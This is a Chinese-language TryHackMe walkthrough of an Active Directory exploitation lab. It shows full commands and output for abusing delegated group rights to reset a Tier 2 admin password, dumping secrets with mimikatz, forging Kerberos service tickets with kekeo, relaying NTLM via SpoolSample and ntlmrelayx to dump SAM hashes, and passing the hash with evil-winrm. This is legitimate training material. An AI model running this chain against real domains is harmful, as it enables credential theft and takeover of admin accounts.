【THM Walkthrough】Exploiting Active Directory (1)

首先一樣從 access頁面得到可以連線到這個AD網域的VPN檔案:


Task 2 Exploiting Permission Delegation

執行後畫面如下圖,手指指的upload data可以把sharphound蒐集回來的內網資訊zip案給上傳:


導入文件後,可以按下圖手指處,輸入任兩個主機名稱(DOMAIN USERS@ZA.TRYHACKME.LOC、Tier 2 ADMINS@ZA.TRYHACKME.LOC)查詢這兩個主機之間的攻擊路徑。

我們還可以從上圖看到目標AD域中的“許可權委派”機制,管理員通過向域用戶組提供不安全的ACE錯誤配置了關於IT Support(技術支援)組的許可權委派,這意味著域用戶組(包括我們所使用的初始AD帳戶)中的任何成員都可以向IT Support組添加帳戶;此外,Bloodhound還顯示IT Support組擁有針對Tier 2 admins組成員的ForceChangePassword ACE。
上述攻擊路徑的第一步是將我們所使用的初始AD帳戶添加到IT Support組,我們將使用AD-RSAT工具集中的Add-ADGroupMember PowerShell cmdlet執行組成員添加操作。

在此之前,要先設定攻擊機網路,DNS Servers要加上DC的IP,等下才連得上:

http://distributor.za.tryhackme.loc/creds 這個網站去要可以登入的低權限帳密:


用kathleen.allen這個帳號登入,並把這個帳號加入IT Support這個群組。

└─$ ssh za.tryhackme.loc\\kathleen.allen@thmwrk1.za.tryhackme.loc
za.tryhackme.loc\kathleen.allen@thmwrk1.za.tryhackme.loc's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\kathleen.allen> $user = Get-ADUser -Identity 'kathleen.allen'
PS C:\Users\kathleen.allen> $group = Get-ADGroup -Identity 'IT Support'
PS C:\Users\kathleen.allen> net user kathleen.allen /domain
The request will be processed at a domain controller for domain za.tryhackme.loc.

User name                    kathleen.allen
Full Name                    Kathleen Allen
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/25/2022 6:30:07 PM
Password expires             Never
Password changeable          4/26/2022 6:30:07 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2023 5:38:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Internet Access      *Domain Users
The command completed successfully.

PS C:\Users\kathleen.allen> Add-ADGroupMember -Identity $group -Members $user
PS C:\Users\kathleen.allen> net user kathleen.allen /domain                  
The request will be processed at a domain controller for domain za.tryhackme.loc.

User name                    kathleen.allen
Full Name                    Kathleen Allen
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/25/2022 6:30:07 PM
Password expires             Never
Password changeable          4/26/2022 6:30:07 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   12/17/2023 5:38:43 AM

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Internet Access      *IT Support
                             *Domain Users
The command completed successfully.

現在我們已經是IT Support組的成員,那麼我們就繼承了針對Tier 2 Admins組的ForceChangePassword許可權委派(授權)。為了利用ForceChangePassword,首先,我們需要確定Tier 2 Admins組的成員並選擇其中一個作為目標,我們可以再次使用Get-ADGroupMembe,之後透過Set-ADAccountPassword來強制更改使用者密碼:

PS C:\Users\brenda.fowler> $t2admin = Get-ADGroupMember -Identity 'Tier 2 Admins' | Get-Random -Count 1
PS C:\Users\brenda.fowler> $t2admin.Name
PS C:\Users\brenda.fowler> $password = 'strong.pass1' | ConvertTo-SecureString -AsPlainText -Force
PS C:\Users\brenda.fowler> Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $password
Set-ADAccountPassword : Access is denied
At line:1 char:1
+ Set-ADAccountPassword -Identity $t2admin -Reset -NewPassword $passwor ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (CN=t2_leon.fran...ryhackme,DC=loc:ADAccount) [Set-ADAccountPa  
   ssword], UnauthorizedAccessException
    + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirecto  

PS C:\Users\brenda.fowler> gpupdate /force
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.


za\kathleen.allen@THMWRK1 C:\Users\kathleen.allen>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\kathleen.allen> $Password = ConvertTo-SecureString "Password123!" -AsPlainText -Force
PS C:\Users\kathleen.allen> Set-ADAccountPassword -Identity "T2_LEON.FRANCIS" -Reset -NewPassword $Password


└─$ ssh za.tryhackme.loc\\t2_leon.francis@thmwrk1.za.tryhackme.loc
za.tryhackme.loc\t2_leon.francis@thmwrk1.za.tryhackme.loc's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\t2_leon.francis@THMWRK1 C:\Users\t2_leon.francis>

由於t2_leon.francis屬於Tier 2管理組的成員,通過利用許可權委派機制,我們成功執行了許可權提升操作並獲得了Tier 2 Administrator許可權。

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\t2_leon.francis@THMWRK1 C:\Users\t2_leon.francis>cd .. 

za\t2_leon.francis@THMWRK1 C:\Users>cd Administrator\Desktop 

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>dir 
 Volume in drive C is Windows                              
 Volume Serial Number is 1634-22A9                         

 Directory of C:\Users\Administrator\Desktop               

06/16/2022  05:09 PM    <DIR>          .                   
06/16/2022  05:09 PM    <DIR>          ..                  
04/30/2022  10:53 AM                31 flag1.txt           
               1 File(s)             31 bytes              
               2 Dir(s)  50,562,793,472 bytes free         

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt 

Task 3 Exploiting Kerberos Delegation

token::elevate - 為了轉儲來自註冊表配置單元中的secrets資訊,我們需要類比SYSTEM使用者,而此命令可用於提升許可權。
lsadump::secrets - 表示Mimikatz將與註冊表配置單元進行行交互以獲取明文憑據。
可以看到下方出現的 svcIIS@za.tryhackme.loc 跟Password1@。

za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt
za\t2_leon.francis@THMWRK1 C:\Users\Administrator\Desktop>cd ..

za\t2_leon.francis@THMWRK1 C:\Users\Administrator>cd ..

za\t2_leon.francis@THMWRK1 C:\Users>cd ..

za\t2_leon.francis@THMWRK1 C:\>C:\Tools\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53             
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                              
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz                  
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/ 

mimikatz # privilege::debug 
Privilege '20' OK 

mimikatz # token::elevate 
Token Id  : 0 
User name :

492     {0;000003e7} 1 D 17536          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary 
 -> Impersonated !
 * Process Token : {0;000878a9} 0 D 687146      ZA\t2_leon.francis      S-1-5-21-3885271727-2693558621-265899518
5-3660  (12g,24p)       Primary
 * Thread Token  : {0;000003e7} 1 D 708037      NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Imperson
ation (Delegation)

mimikatz # lsadump::secrets 
Domain : THMWRK1 
SysKey : a1403e57976b472bce5f231922ca3942

Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 )
Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 ) 
Domain FQDN : za.tryhackme.loc

Policy subsystem is : 1.18
LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27}
  [00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a95c2af4463 

Secret  : $MACHINE.ACC
cur/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g 
old/text: 0FFIKa"c[#L6T>=.s*ZW'Gz04FL&7,"VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs`&suI rmg,g 

Secret  : DefaultPassword
old/text: vagrant

cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 
5e 3f 03 8d 79 49 90 e7 2e e0
    full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0
    m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0 
old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 
02 0b c1 5b 24 f4 44 d0 74 31  
    full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431
    m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431 

Secret  : NL$KM
cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 
2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58  
old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7  
2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 58

Secret  : _SC_thmwinauth / service 'thmwinauth' with username : svcIIS@za.tryhackme.loc
cur/text: Password1@

tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
/user - 表示擁有約束性委派許可權的用戶。
/domain - 指定我們將要攻擊的目標功能變數名稱稱,因為Kekeo工具可以用於偽造票據以濫用跨森林信任關係。
/password - 表示與svcIIS帳戶關聯的密碼。
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
/tgt - 我們在此提供於前一步驟中所生成的TGT。
/user - 指定我們想要模擬(即假冒)的用戶;由於 t2
accounts對相關的工作站具有管理存取權限,因此我們可以假設t1 accounts對本例中的目標服務器具有管理存取權限,因此我們將選擇我們想要模擬的t1 account(如t1_trevor.jones)。
/service - 指定我們希望使用委派來類比的服務,我們首先將為HTTP服務生成一個TGS,然後我們再為WSMAN服務重新運行和上述類似的命令即可。

PS C:\> C:\Tools\kekeo\x64\kekeo.exe

  ___ _    kekeo 2.1 (x64) built on Dec 14 2021 11:51:55 
 /   ('>-  "A La Vie, A L'Amour"
 | K  |    /* * *
 \____/     Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  L\_       https://blog.gentilkiwi.com/kekeo                (oe.eo)
                                             with 10 modules * * */

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@ 
Realm        : za.tryhackme.loc (za) 
User         : svcIIS (svcIIS)
CName        : svcIIS   [KRB_NT_PRINCIPAL (1)]
SName        : krbtgt/za.tryhackme.loc  [KRB_NT_SRV_INST (2)]
Need PAC     : Yes
Auth mode    : ENCRYPTION KEY 23 (rc4_hmac_nt      ): 43460d636f269c709b20049cee36ae7a 
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: (auto)
  > Ticket in file 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi' 

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor
.jones /service:http/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi 
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac       
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2023 6:46:18 AM ; 12/17/2023 4:46:18 PM] {R:12/24/2023 6:46:18 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): dbdf390fe81443fa8129fd5f94ff62cfa250aa28f9827a219f00d
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
  [s4u2proxy] http/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor
.jones /service:wsman/THMSERVER1.za.tryhackme.loc
Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2023 6:46:18 AM ; 12/17/2023 4:46:18 PM] {R:12/24/2023 6:46:18 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): dbdf390fe81443fa8129fd5f94ff62cfa250aa28f9827a219f00d
  [s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
  [s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirb

kekeo # exit
PS C:\> C:\Tools\mimikatz_trunk\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK     

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.

* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK      

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7AE6443B8

mimikatz # exit
PS C:\> klist

Current LogonId is 0:0x878a9

Cached Tickets: (2)

#0>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2023 6:46:34 (local)
        End Time:   12/17/2023 16:46:18 (local)
        Renew Time: 12/24/2023 6:46:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: wsman/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2023 6:46:48 (local)
        End Time:   12/17/2023 16:46:18 (local)
        Renew Time: 12/24/2023 6:46:18 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:



t's possible to use a native Windows binary winrs to connect to a remote endpoint via WinRM like so:

winrs -r:ws01 "cmd /c hostname & notepad"

we connect from DC01 to WS01 and execute two processes hostname,notepad and the process partent/child relationship for processes spawned by the winrshost.exe

PS C:\> winrs -r:thmserver1.za.tryhackme.loc cmd
Microsoft Windows [Version 10.0.17763.1098] 
(c) 2018 Microsoft Corporation. All rights reserved.



C:\Users\t1_trevor.jones>cd .. 
cd .. 

C:\Users>cd Administrator\Desktop 
cd Administrator\Desktop 

 Volume in drive C is Windows 
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\Administrator\Desktop

04/30/2022  01:10 PM    <DIR>          .
04/30/2022  01:10 PM    <DIR>          ..
04/30/2022  01:10 PM                92 flag2.txt
               1 File(s)             92 bytes
               2 Dir(s)  50,854,244,352 bytes free

C:\Users\Administrator\Desktop>type flag2.txt 
type flag2.txt 

Task 4 Exploiting Automated Relays

接下來主要將介紹身份驗證機制中的自動中繼技術(即NTLM Relay),我們會學習如何強制執行身份驗證。在AD中有一個例外的情況,即一台機器對另一台機器擁有管理員許可權。本質上,這是在AD配置中將一台主機的管理許可權授予另一台主機,同樣,這是網域控制站或SQL集群等必須同步的預期功能。這就為攻擊者強制執行身份驗證提供了一個非常有趣的攻擊向量。




Printer Bug(印表機缺陷)
printer bug(印表機缺陷)是MS-RPRN協議(PrintSystem Remote Protocol)的一個特性,它允許域使用者遠端強制目標主機運行Print Spooler服務以實現對任意IP位址進行身份驗證。最近幾年出現的類似bug有:Spooler、PetitPotam、PrintNightmare。微軟聲稱唯一的缺陷(bug)是上述這些bug有些根本不需要AD憑據就能通過身份驗證,但是這個問題已經通過發佈安全補丁解決了。
為了更好地利用Printer Bug特性以強制執行身份驗證,除了目的機器帳戶的管理許可權之外,我們還需要滿足以下四個條件:

  1. 需要獲得一組針對特定目標域的有效AD帳戶憑據。
  2. 需要具有指向目標SMB服務的網路連接。
  3. 目標主機必須正在運行Print Spooler服務(即列印幕後處理服務)。
  4. 目標主機不能強制執行SMB簽名。(nmap會顯示Message signing enabled but not required)

Print Spooler服務
我們需要確定目標的Print Spooler服務(即列印幕後處理服務)是否正在運行。因為我們不能直接訪問THMSERVER2目的機,所以我們需要從域網路的視角進行資訊查詢。在這種情況下,我們可以在針對跳板主機THMWRK1的SSH會話介面中使用WMI查詢命令來查看目標域的印表機服務的當前狀態:

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\christine.hall@THMWRK1 C:\Users\christine.hall>powershell -ep bypass        
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\christine.hall>

基於下述掃描結果,我們可以看到目標伺服器的SMB簽名是啟用的但是並不被強制執行。如此,我們利用Printer Bug特性以執行NTLM Relay攻擊(一種強制執行身份驗證的攻擊方式)的條件已經全部滿足了。

└─$ sudo nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-22 00:24 EST
Nmap scan report for thmserver1.za.tryhackme.loc (
Host is up (0.25s latency).

445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap scan report for thmserver2.za.tryhackme.loc (
Host is up (0.44s latency).

445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Nmap done: 2 IP addresses (2 hosts up) scanned in 11.15 seconds

注意:這種攻擊方式是不穩定的,濫用Print Spooler服務可能會導致該服務崩潰,並且執行結果也不一定會有相應的回檔。
我們將使用Spoolsample.exe來強制THMSERVER2針對我們的攻擊機進行身份驗證,然後我們會使用Impacket中的ntlmrelayx.py腳本來中繼(轉發)身份驗證嘗試到THMSERVER1機器。 請注意,如果我們使用的是本地kali攻擊機,那麼還需要確保我們的攻擊機上擁有已更新版本的Impacket以便支持SMBv2。

設置NTLM中繼(NTLM Relay),看到「Servers started, waiting for connections」代表成功。如果我們在上述命令中所指定的是主機名稱THMSERVER1而不是IP位址,那麼目標主機會請求我們使用Kerberos身份驗證而不是NTLM身份驗證。因此,我們應該在上面的命令中指定IP地址。

└─$ locate ntlmrelayx.py        

└─$ /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb:// -debug  
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections


PS C:\Users\christine.hall> cd C:\Tools                                   
PS C:\Tools> dir 

    Directory: C:\Tools

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/29/2022  11:48 AM                kekeo
d-----        4/30/2022  11:52 AM                mimikatz_trunk
d-----        4/30/2022  11:38 AM                PowerSploit
-a----       12/21/2023   5:26 AM         282814 20231221052630_BloodHound.zip 
-a----        4/30/2022  12:47 PM         770279 PowerView.ps1
-a----        6/10/2022  11:49 AM         906752 SharpHound.exe
-a----        6/13/2022   6:57 PM         157696 SpoolSample.exe


PS C:\Tools> .\SpoolSample.exe THMSERVER2.za.tryhackme.loc
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\THMSERVER2.za.tryhackme.loc, CaptureServer: \\      
RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1707 - The netw
ork address is invalid.

成功執行上述步驟之後,我們應該會在攻擊機上接收到一個身份驗證嘗試以及指向THMSERVER1的中繼(轉發)資訊。我們可以在設置NTLM中繼時添加-c 'whoami /all'以指定執行某個命令,如果我們不指定執行任何命令,那麼就會進行hashdump(雜湊密碼轉儲),然後我們就能獲得相關憑據,並能使用這些憑據(比如進行PtH攻擊)來嘗試獲取目標主機的shell。

└─$ /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb:// -debug  
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from, attacking target smb://
[*] Authenticating against smb:// as ZA/THMSERVER2$ SUCCEED
[+] No more targets
[*] SMBD-Thread-7 (process_request_thread): Connection from controlled, but there are no more targets left!
[+] No more targets
[*] SMBD-Thread-8 (process_request_thread): Connection from controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x4e05e7ea4fdddde75aa56010474948dc
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[+] NewStyle hashes is: True
[*] Done dumping SAM hashes for host:
[*] Stopping service RemoteRegistry


└─$ cat hashes.txt

└─$ evil-winrm -i -u ServerAdmin -H 3279a0c6dfe15dc3fb6e9c26dd9b066c

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd ..
*Evil-WinRM* PS C:\Users> dir

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/30/2022  11:07 AM                .NET v2.0
d-----        4/30/2022  11:07 AM                .NET v2.0 Classic
d-----        4/30/2022  11:07 AM                .NET v4.5
d-----        4/30/2022  11:07 AM                .NET v4.5 Classic
d-----        4/25/2022   8:52 PM                Administrator
d-----        4/27/2022   8:32 AM                Administrator.ZA
d-----        4/30/2022  11:07 AM                Classic .NET AppPool
d-----       12/20/2023   1:44 PM                Cub3
d-----       12/20/2023   4:31 PM                elliot
d-r---        3/21/2020   8:25 PM                Public
d-----        6/13/2022   2:43 PM                t1_jake.scott
d-----        6/13/2022   2:32 PM                t1_jay.wilson
d-----       12/20/2023   1:40 PM                t1_jemma.davey
d-----        6/13/2022   2:28 PM                t1_steven.blake
d-----        4/30/2022   3:30 PM                t1_trevor.jones
d-----        4/30/2022   4:15 PM                trevor.local
d-----        3/21/2020   8:52 PM                vagrant

*Evil-WinRM* PS C:\Users> cd Administrator.ZA\Desktop
*Evil-WinRM* PS C:\Users\Administrator.ZA\Desktop> dir

    Directory: C:\Users\Administrator.ZA\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/1/2022   3:50 PM             25 flag3.txt

*Evil-WinRM* PS C:\Users\Administrator.ZA\Desktop> type flag3.txt

